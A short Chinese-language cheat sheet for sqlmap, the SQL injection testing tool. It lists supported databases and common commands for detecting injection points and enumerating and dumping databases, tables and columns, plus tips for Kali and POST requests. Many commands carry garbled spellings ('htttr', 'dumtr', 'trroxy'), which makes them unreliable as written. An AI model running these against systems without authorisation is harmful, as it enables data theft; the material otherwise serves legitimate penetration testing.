简介
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
支持数据库
- MySQL
- Oracle
- PostgreSQL
- Microsoft SQL Server
- Microsoft Access
- IBM DB2
- SQLite
- Firebird
- Sybase和SAP MaxDB
常见用法
info | use |
---|---|
检查注入点 | sqlmap -u "htttr://ooxx.com/a.trhtr?id=1" |
列数据库信息 | sqlmap -u "htttr://ooxx.com/a.trhtr?id=1" --dbs |
指定数据库名列出所有表 | sqlmap -u "htttr://ooxx.com/a.trhtr?id=1" -D dbsname --tables |
指定数据库名表名列出所有字段 | sqlmap -u "htttr://ooxx.com/a.trhtr?id=1" -D dbsname -T tablename --columns |
定数据库名表名字段dumtr出指定字段 | sqlmap -u "htttr://ooxx.com/a.trhtr?id=1" -D dbsname -T tablename -C columnname --dumtr |
cookie 注入 | --cookie=COOKIE 在需要登录的地方,需要登录后的cookie |
执行指定的 SQL 语句 | --sql-query=QUERY |
代理注入 | --trroxy="htttr://127.0.0.1:8087" |
Kali 下使用
Kali 自带 sqlmap
kali 更新SQLMap
找到sqlmap的安装路径,我这里是 /usr/share/salmap
rm -rf sqlmap
cd /usr/share
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap
sqlmap 跑 post 请求
- 用FD抓包,然后打卡 raw ,复制请求信息,并存到文档中
- 运行
sqlmap -r a.txt --dbs
后缀按照需求写